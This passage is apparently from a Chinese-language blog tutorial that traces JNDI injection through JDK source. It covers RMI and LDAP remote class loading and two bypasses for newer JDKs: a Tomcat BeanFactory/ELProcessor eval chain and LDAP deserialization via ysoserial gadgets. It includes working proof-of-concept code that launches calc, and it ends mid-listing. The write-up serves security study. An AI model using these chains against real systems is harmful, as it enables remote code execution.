// builder must return non-null factory<br>        factory = builder.createObjectFactory(refInfo, environment);<br>        return factory.getObjectInstance(refInfo, name, nameCtx,<br>            environment);<br>    &#125;<br><br>    // Use reference if possible<br>    Reference ref = null;<br>    if (refInfo instanceof Reference) &#123;<br>        ref = (Reference) refInfo;<br>    &#125; else if (refInfo instanceof Referenceable) &#123;<br>        ref = ((Referenceable)(refInfo)).getReference();<br>    &#125;<br><br>    Object answer;<br><br>    if (ref != null) &#123;<br>        String f = ref.getFactoryClassName();<br>        if (f != null) &#123;<br>            // if reference identifies a factory, use exclusively<br><br>            factory = getObjectFactoryFromReference(ref, f);<br>            if (factory != null) &#123;<br>                return factory.getObjectInstance(ref, name, nameCtx,<br>                                                 environment);<br>            &#125;<br>            // No factory found, so return original refInfo.<br>            // Will reach this point if factory class is not in<br>            // class path and reference does not contain a URL for it<br>            return refInfo;<br><br>        &#125; else &#123;<br>            // if reference has no factory, check for addresses<br>            // containing URLs<br><br>            answer = processURLAddrs(ref, name, nameCtx, environment);<br>            if (answer != null) &#123;<br>                return answer;<br>            &#125;<br>        &#125;<br>    &#125;<br><br>    // try using any specified factories<br>    answer =<br>        createObjectFromFactories(refInfo, name, nameCtx, environment);<br>    return (answer != null) ? answer : refInfo;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>上面的执行逻辑：传入的 Object 是引用类型实例或其子类实例，就进行强转，赋值给 ref, 判断 ref 及它的 factory 不为空就调用方法 getFactoryFromReference()获得 Reference 的 factory</p>
<ul>
<li>getObjectInstacne 这个方法设计之初是为了让 JNDI 去处理 RMI 的注册中心绑定对象为 Reference 的这种情况，用引用对象去加载真正的对象， JNDI 支持解引用，它的原因其实是在这里。</li>
</ul>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758873011684-d5e3ee2b-64ff-4cb6-8b3c-c1bb275031e0.png" srcset="/img/loading.gif" lazyload></p>
<p>跟进**NamingManager.getFactoryFromReference()**，类加载的逻辑就都在这里</p>
<p>首先是 AppClassLoader 进行加载类，这里 helper 是抽象类 VersionHelper 的实例化对象,而 VersionHelper12 实现该抽象类，调的就是 VersionHelper12.loadClass 方法,调用重载的方法 forName,全类名反射,但是本地肯定加载不类，所以返回给的 cls 为空</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-comment">//NamingManager.getFactoryFromReference()</span><br>clas = helper.loadClass(factoryName);<br></code></pre></td></tr></table></figure>

<p>VersionHelper12.loadClass</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758890412466-e118d5eb-3beb-43ce-ae66-93fdff9515dd.png" srcset="/img/loading.gif" lazyload></p>
<p>APP 从本地没有加载到接着会从 codebase 中加载，即传给 factoryLocation 的那个 url，下一步还是 helper 调用 loadClass 进行类加载，进入到 VersionHelper12.loadClass</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758873651923-73f81e40-a6a7-42f9-884d-c61f1754c767.png" srcset="/img/loading.gif" lazyload></p>
<p>该方法里面先用 URLClassLoader 实例化生成类加载器，又进入重载的方法还是反类名反射获得类对象</p>
<ul>
<li>回顾一下，重载方法这里 forName 全类名反射会触发类的初始化<font style="background-color:#FBDE28;">执行并合并静态代码块和静态变量</font>。所以如果我的恶意代码写在了静态方法中，此时已经可以弹出计算器了，但我们写在了构造方法中，就需要后面的实例化才能触发</li>
</ul>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758874108009-d341a86d-2675-423e-9986-06303929e538.png" srcset="/img/loading.gif" lazyload></p>
<p>重载的方法 VersionHelper12.loadClass：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs java">Class&lt;?&gt; loadClass(String className, ClassLoader cl)<br>     <span class="hljs-keyword">throws</span> ClassNotFoundException &#123;<br>     Class&lt;?&gt; cls = Class.forName(className, <span class="hljs-literal">true</span>, cl);<br>     <span class="hljs-keyword">return</span> cls;<br> &#125;<br><br></code></pre></td></tr></table></figure>

<p>这里加载类成功，之后返回刚刚的流程接着 getFactoryFromReference()那里最后实例化触发恶意类构造函数执行，弹出计算器</p>
<p>再说一下返回值赋给了 factory,所以它是恶意类的实例化对象</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1758874358953-c0aea2da-7f36-4508-addf-6f9c5765fb3f.png" srcset="/img/loading.gif" lazyload></p>
<p>该漏洞在 jdk8u121 中被修复。在 RegistryContext.decodeCodeObject 里面增加了 trustURLCodebase</p>
<p>只有当客户端手动开启之后才允许远程加载类，虽然但是危险加载类的方法是在 NamingManager.getFactoryFromReference()，在 8u191 之前 LDAP 的 Context 中并没有进行修复,所以 LDAP 还是能攻击</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs plain">private Object decodeObject(Remote var1, Name var2) throws NamingException &#123;<br>	try &#123;<br>		Object var3 = var1 instanceof RemoteReference ? ((RemoteReference)var1).getReference() : var1;<br>		Reference var8 = null;<br>		if (var3 instanceof Reference) &#123;<br>			var8 = (Reference)var3;<br>		&#125; else if (var3 instanceof Referenceable) &#123;<br>			var8 = ((Referenceable)((Referenceable)var3)).getReference();<br>		&#125;<br><br>		if (var8 != null &amp;&amp; var8.getFactoryClassLocation() != null &amp;&amp; !trustURLCodebase) &#123;<br>			throw new ConfigurationException(&quot;The object factory is untrusted. Set the system property &#x27;com.sun.jndi.rmi.object.trustURLCodebase&#x27; to &#x27;true&#x27;.&quot;);<br>		&#125; else &#123;<br>			return NamingManager.getObjectInstance(var3, var2, this, this.environment);<br>		&#125;<br>	&#125; catch (NamingException var5) &#123;<br>		throw var5;<br>	&#125; catch (RemoteException var6) &#123;<br>		throw (NamingException)wrapRemoteException(var6).fillInStackTrace();<br>	&#125; catch (Exception var7) &#123;<br>		NamingException var4 = new NamingException();<br>		var4.setRootCause(var7);<br>		throw var4;<br>	&#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>造成攻击的原因：</p>
<p>在服务端 bind 了一个 Reference 引用对象到注册中心，客户端 lookup 向注册中心查询它并下载到本地，会到 Reference 的 classFactoryLocation 指定的地址去下载 className 指定 class 文件，攻击者可以在构造方法或者是静态代码等地方加入恶意代码，接着加载并实例化，从而加载远程恶意 class 实现 RCE。</p>
<p>JNDI+RMI 的攻击：</p>
<p>原生 RMI：JNDI 的 API(InitialContext)调用 lookup 走的还是 RMI 的逻辑</p>
<p>JNDI 注入：客户端进行调用时会走完 RMI 原生逻辑之后调用 decodeObject 里面最后走到加载 Reference 的 factory,即方法 getFactoryFromReference()，主要是运用动态类加载造成漏洞造成攻击的原因：</p>
<h2 id="3-2-JNDI-LDAP"><a href="#3-2-JNDI-LDAP" class="headerlink" title="3.2 JNDI +LDAP"></a>3.2 JNDI +LDAP</h2><h3 id="1-1-LDAP"><a href="#1-1-LDAP" class="headerlink" title="1.1 LDAP"></a>1.1 LDAP</h3><p>上面简介中讲 LDAP 属于目录服务，目录服务是一个特殊的数据库，用来保存描述性的、基于属性的详细信息，支持过滤功能。</p>
<p>LDAP 目录服务是由目录数据库和一套访问协议组成的系统。所以它既是一个服务也是协议</p>
<p>LDAP 并不是 java 的东西，它是一个协议</p>
<p>在这里用 ApacheDirectoryStudio 先启动一个 LDAP 服务</p>
<p>然后服务端用 JNDI 去连接，并且绑定引用对象到 LDAP 服务上，引用对象里面封装的恶意 http 服务端：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs plain">public class LDAPServer &#123;<br>    public static void main(String[] args) throws NamingException &#123;<br>        InitialContext initialContext = new InitialContext();<br>        Reference reference = new Reference(&quot;Calc&quot;,&quot;Calc&quot;,&quot;http://127..0.1:7000/&quot;);<br>        initialContext.rebind(&quot;ldap：//localhost:10389/cn=test,dc=example,dc=com&quot;,reference);<br><br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>可以看到已经绑定成功了</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1759046973912-fd978054-2b87-4029-9942-00bcb31acbb0.png" srcset="/img/loading.gif" lazyload></p>
<p>再运行客户端，弹出计算器。客户端 lookup,是根据传递参数的协议，进而走相对应的 Context 逻辑</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plain">public class LDAPClient &#123;<br>    public static void main(String[] args) throws NamingException &#123;<br>        InitialContext initialContext = new InitialContext();<br>        initialContext.lookup(&quot;ldap://localhost:10389/cn=test,dc=example,dc=com&quot;);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1759047252047-06641098-2145-49b7-8569-d8bb0a7037d8.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="1-2-断点分析"><a href="#1-2-断点分析" class="headerlink" title="1.2 断点分析"></a>1.2 断点分析</h3><p>还是 lookup 处下断点，接着进入 LdapCtx.c_lookup—–&gt;DirectoryManager.getObjectInstance()它是 NamingManager 的子类—&gt;NamingManager.getObjectFactoryFromReference()</p>
<p>就还是来到了前面所说的动态类加载的地方，一样的流程先从本地加载没加载到，从获取的 codebase 中进行加载。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs plain">//NamingManager.getObjectFactoryFromReference()<br>static ObjectFactory getObjectFactoryFromReference(<br>    Reference ref, String factoryName)<br>    throws IllegalAccessException,<br>    InstantiationException,<br>    MalformedURLException &#123;<br>    Class&lt;?&gt; clas = null;<br><br>    // Try to use current class loader<br>    try &#123;<br>         clas = helper.loadClass(factoryName);<br>    &#125; catch (ClassNotFoundException e) &#123;<br>        // ignore and continue<br>        // e.printStackTrace();<br>    &#125;<br>    // All other exceptions are passed up.<br><br>    // Not in class path; try to use codebase<br>    String codebase;<br>    if (clas == null &amp;&amp;<br>            (codebase = ref.getFactoryClassLocation()) != null) &#123;<br>        try &#123;<br>            clas = helper.loadClass(factoryName, codebase);<br>        &#125; catch (ClassNotFoundException e) &#123;<br>        &#125;<br>    &#125;<br><br>    return (clas != null) ? (ObjectFactory) clas.newInstance() : null;<br>&#125;<br></code></pre></td></tr></table></figure>

<h3 id="总结-1"><a href="#总结-1" class="headerlink" title="总结"></a>总结</h3><p>LDAP+JNDI 还是将 Reference 引用对象进行绑定，只不过绑定到了 LDAP 端</p>
<p>攻击点：客户端获取了绑定的对象之后，获取 Reference 的工厂对象 factory，进而导致远程类加载</p>
<p>至此仅依赖 jdk 内置源码的 JNDI 注入收尾，下面高版本的绕过需要其他依赖</p>
<h1 id="四-绕过高版本-jdk（-191）"><a href="#四-绕过高版本-jdk（-191）" class="headerlink" title="四.绕过高版本 jdk（&gt;191）"></a>四.绕过高版本 jdk（&gt;191）</h1><p><strong>高版本修复点</strong>：在 jdk8u191 之后，还是先从本地进行加载，再从 codebase 进行加载，但是从 codecase 中加载类时，不同于 RMI 在 RegistryContext 的修复在这里是 loadClass 添加了 trustURLCodebase 进行修复，是 true 的时候才允许从远端进行加载。它走到获得引用对象那里都是 ok 的，只是不允许远程从工厂位置加载类。说明引用对象还是可以利用的。</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1759056980994-7d8e90bb-ec1b-4f5a-b3f8-bf2d4345498e.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="4-1-绕过一"><a href="#4-1-绕过一" class="headerlink" title="4.1 绕过一"></a>4.1 绕过一</h2><p><strong>本地加载工厂对象，以此为连接点，执行工厂对象的恶意方法</strong></p>
<p>前面逻辑：DirectManger.getObjectInstance()调用 NamingManger.getFactoryFromReference() 在获取工厂的方法中加载类造成攻击</p>
<p>而高版本获取工厂对象被修复·正常执行而不是作为攻击点，之后又正常走回到 DirectManger.getObjectInstance，调用 factory 的 getObjectInstancee，factory 是获取的工厂类对象，并且传入方法的参数都是可控的，注意下传入的第一个参数 ref 是绑定的引用对象。所以就得先找到一个工厂类来连接后续的攻击</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs plain">public static Object<br>    getObjectInstance(Object refInfo, Name name, Context nameCtx,<br>                      Hashtable&lt;?,?&gt; environment, Attributes attrs)<br>    throws Exception &#123;<br><br>        ......<br>        Object answer;<br><br>        if (ref != null) &#123;<br>                String f = ref.getFactoryClassName();<br>                if (f != null) &#123;<br>                    // if reference identifies a factory, use exclusively<br><br>                    factory = getObjectFactoryFromReference(ref, f);<br>                    if (factory instanceof DirObjectFactory) &#123;<br>                        return ((DirObjectFactory)factory).getObjectInstance(<br>                            ref, name, nameCtx, environment, attrs);<br>                    &#125; else if (factory != null) &#123;<br>                        return factory.getObjectInstance(ref, name, nameCtx,<br>                                                         environment);<br>                    &#125;<br>                    // No factory found, so return original refInfo.<br>                    // Will reach this point if factory class is not in<br>                    // class path and reference does not contain a URL for it<br>                    return refInfo;<br><br>                &#125; ......<br></code></pre></td></tr></table></figure>

<p>找依赖优先找最常见的,最终选择 tomcat 的 org.apache.naming.factory.BeanFactory</p>
<p>它调用 getObjectInstance</p>
<h3 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h3><p>先绑定引用对象到 RMI</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> NamingException, RemoteException, AlreadyBoundException &#123;<br>       <span class="hljs-type">Registry</span> <span class="hljs-variable">registry</span> <span class="hljs-operator">=</span> LocateRegistry.createRegistry(<span class="hljs-number">1099</span>);<br>       <span class="hljs-type">InitialContext</span> <span class="hljs-variable">initialContext</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">InitialContext</span>();<br>       <span class="hljs-type">ResourceRef</span> <span class="hljs-variable">resourceRef</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ResourceRef</span>(<span class="hljs-string">&quot;javax.el.ELProcessor&quot;</span>,<span class="hljs-literal">null</span>,<span class="hljs-string">&quot;&quot;</span>,<span class="hljs-string">&quot;&quot;</span>,<br>               <span class="hljs-literal">true</span>,<span class="hljs-string">&quot;org.apache.naming.factory.BeanFactory&quot;</span>,<span class="hljs-literal">null</span> );<br>       resourceRef.add(<span class="hljs-keyword">new</span> <span class="hljs-title class_">StringRefAddr</span>(<span class="hljs-string">&quot;forceString&quot;</span>, <span class="hljs-string">&quot;x=eval&quot;</span>));<br>       resourceRef.add(<span class="hljs-keyword">new</span> <span class="hljs-title class_">StringRefAddr</span>(<span class="hljs-string">&quot;x&quot;</span>,<span class="hljs-string">&quot;Runtime.getRuntime().exec(&#x27;calc&#x27;)&quot;</span> ));<br>       initialContext.rebind(<span class="hljs-string">&quot;rmi://localhost:1099/remoteObj&quot;</span>, resourceRef);<br><br>   &#125;<br><br><br></code></pre></td></tr></table></figure>

<p>客户端还是直接调用</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760348343499-7911a206-16e3-4d32-bc52-3886850e2c6c.png" srcset="/img/loading.gif" lazyload></p>
<p>那接下来看为什么绑定引用对象那样写，跟进调试 BeanFactory.getObjectInstance()</p>
<p>该方法中反射实例化了一个 beanclass 对象，反射调用 setterName,且它可控</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><code class="hljs plain">public class BeanFactory implements ObjectFactory &#123;<br>    public BeanFactory() &#123;<br>    &#125;<br><br>    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable&lt;?, ?&gt; environment) throws NamingException &#123;<br>        if (obj instanceof ResourceRef) &#123;<br>            try &#123;<br>                Reference ref = (Reference)obj;<br>                String beanClassName = ref.getClassName();<br>                Class&lt;?&gt; beanClass = null;<br>                ClassLoader tcl = Thread.currentThread().getContextClassLoader();<br>                if (tcl != null) &#123;<br>                    try &#123;<br>                        beanClass = tcl.loadClass(beanClassName);<br>                    &#125; catch (ClassNotFoundException var26) &#123;<br>                    &#125;<br>                &#125; else &#123;<br>                    try &#123;<br>                        beanClass = Class.forName(beanClassName);<br>                    &#125; catch (ClassNotFoundException e) &#123;<br>                        e.printStackTrace();<br>                    &#125;<br>                &#125;<br><br>                if (beanClass == null) &#123;<br>                    throw new NamingException(&quot;Class not found: &quot; + beanClassName);<br>                &#125; else &#123;<br>                    BeanInfo bi = Introspector.getBeanInfo(beanClass);<br>                    PropertyDescriptor[] pda = bi.getPropertyDescriptors();<br>                    Object bean = beanClass.getConstructor().newInstance();<br>                    RefAddr ra = ref.get(&quot;forceString&quot;);<br>                    Map&lt;String, Method&gt; forced = new HashMap();<br>                    if (ra != null) &#123;<br>                        String value = (String)ra.getContent();<br>                        Class&lt;?&gt;[] paramTypes = new Class[]&#123;String.class&#125;;<br><br>                        for(String param : value.split(&quot;,&quot;)) &#123;<br>                            param = param.trim();<br>                            int index = param.indexOf(61);<br>                            String setterName;<br>                            if (index &gt;= 0) &#123;<br>                                setterName = param.substring(index + 1).trim();<br>                                param = param.substring(0, index).trim();<br>                            &#125; else &#123;<br>                                setterName = &quot;set&quot; + param.substring(0, 1).toUpperCase(Locale.ENGLISH) + param.substring(1);<br>                            &#125;<br><br>                            try &#123;<br>                                forced.put(param, beanClass.getMethod(setterName, paramTypes));<br>                            &#125; catch (SecurityException | NoSuchMethodException var24) &#123;<br>                                throw new NamingException(&quot;Forced String setter &quot; + setterName + &quot; not found for property &quot; + param);<br>                            &#125;<br>                        &#125;<br>                    &#125;<br><br>                    Enumeration&lt;RefAddr&gt; e = ref.getAll();<br><br>                    while(e.hasMoreElements()) &#123;<br>                        ra = (RefAddr)e.nextElement();<br>                        String propName = ra.getType();<br>                        if (!propName.equals(&quot;factory&quot;) &amp;&amp; !propName.equals(&quot;scope&quot;) &amp;&amp; !propName.equals(&quot;auth&quot;) &amp;&amp; !propName.equals(&quot;forceString&quot;) &amp;&amp; !propName.equals(&quot;singleton&quot;)) &#123;<br>                            String value = (String)ra.getContent();<br>                            Object[] valueArray = new Object[1];<br>                            Method method = (Method)forced.get(propName);<br>                            if (method != null) &#123;<br>                                valueArray[0] = value;<br><br>                                try &#123;<br>                                    method.invoke(bean, valueArray);<br>                                    ......<br></code></pre></td></tr></table></figure>

<p>beanClass 就是引用对象传入的类 ELProcessor</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760343901459-d6aeab1e-8aa5-46ea-8597-c9a8029b8836.png" srcset="/img/loading.gif" lazyload></p>
<p>setterName 就是由引用对象 ref.get(forceString)得到的：</p>
<p>从 Reference 中取名为 forceString 的值（ “x&#x3D;eval”），将其解析为“属性名 -&gt; 方法名”的映射，接着检查是否存在等号（ascii&#x3D;61），不存在就到用默认的 setter 方法，当然我们传入值是存在&#x3D;的，就会强制设置 setterName 等于键为 x 对应的值 eval</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760344122583-0ccb4d4b-d897-486d-9c34-0a4390cecdd0.png" srcset="/img/loading.gif" lazyload></p>
<p>之后这里将 beanclass 生成的抽象 eval 的 Method 方法存在了 HashMap 中</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760346981007-cb812685-08e5-42fc-a9a6-f446938e78b5.png" srcset="/img/loading.gif" lazyload></p>
<p>从下一个元素中取名为 x 的值作为反射调用方法的参数，并且从 forced 这个 HashMap 表中获得方法赋值给 Method</p>
<p>然后执行 method.invoke,反射调用</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760347395455-69fa7e5f-26f7-4947-afff-f011063ebf13.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="4-2-绕过二"><a href="#4-2-绕过二" class="headerlink" title="4.2 绕过二"></a>4.2 绕过二</h2><p>跟着调试了一下，发现 Ldap 和 RMI 高版本不一样，加载本地工厂，执行工厂恶意方法反射调用是走不通的：</p>
<p>可以看到工厂执行的恶意方法首先有检测，传入的参数需要为 ResourceRef 的子类，才会进入 if 执行反射调用方法</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760359920994-528a732c-df8a-4be2-ba74-528268778cb0.png" srcset="/img/loading.gif" lazyload></p>
<p>往前调，工厂对象的 getObjectInstance 恶意方法是在 DirectManager.getObjectInstance 方法中获取完工厂对象后调用的。</p>
<p>再往前调，第一个参数是由 decodeObject 方法获得的，为 Reference 类型<img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760364752734-784d9218-628a-4f0e-9859-94fca028b652.png" srcset="/img/loading.gif" lazyload></p>
<blockquote>
<p>tips：一个知识点和上面没啥关系，但也是上面跟踪的时候差点误以为 LDAP 打不通的点：</p>
<p>RMI，LDAP 工厂对象调用恶意方法时的参数，虽然都经过了强制类型转化，转化为 Reference,但这是父类引用指向子类对象。在编译时是父类引用，但在执行过程中是以原本的类型执行。RMI 的参数就是我们绑定的 ResourceRef 对象强转，Ldap 是 decodeObject 返回的变量 var3 是 Reference 类型</p>
</blockquote>
<p>所以接下来学高版本绕过二：</p>
<p><strong>LDAP 在获取远远程对象之后进行 decodeObject 解码，该方法中触发反序列化</strong></p>
<hr>
<p>如果 java 对象的 javaClassName 属性值不为空，就会调用 deserializeObject 反序列化方法，</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760358708317-4b3b8c97-d7ee-4f08-9aa8-b7cfeaa2718d.png" srcset="/img/loading.gif" lazyload></p>
<p>该方法中如果 javaSerializedData 属性值不为空，获得一个 URLClassLoader 并返回一个序列化数据</p>
<p><img src="https://typor-imagesbx.oss-cn-beijing.aliyuncs.com/1760580954198-2611e22b-0b28-409f-9305-f129c9dd9bfb.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="代码-1"><a href="#代码-1" class="headerlink" title="代码"></a>代码</h3><p>ysoserial 生成 CC6gadget</p>
<p>服务端客户端都添加依赖：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;dependency&gt;<br>    &lt;groupId&gt;com.alibaba&lt;/groupId&gt;<br>    &lt;artifactId&gt;fastjson&lt;/artifactId&gt;<br>    &lt;version&gt;1.2.80&lt;/version&gt;<br>&lt;/dependency&gt;<br>&lt;dependency&gt;<br>    &lt;groupId&gt;commons-collections&lt;/groupId&gt;<br>    &lt;artifactId&gt;commons-collections&lt;/artifactId&gt;<br>    &lt;version&gt;3.2.1&lt;/version&gt;<br>&lt;/dependency&gt;<br></code></pre></td></tr></table></figure>

<p>服务端：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> JNDI_RMI_Injection;<br><br><span class="hljs-keyword">import</span> com.unboundid.util.Base64;<br><span 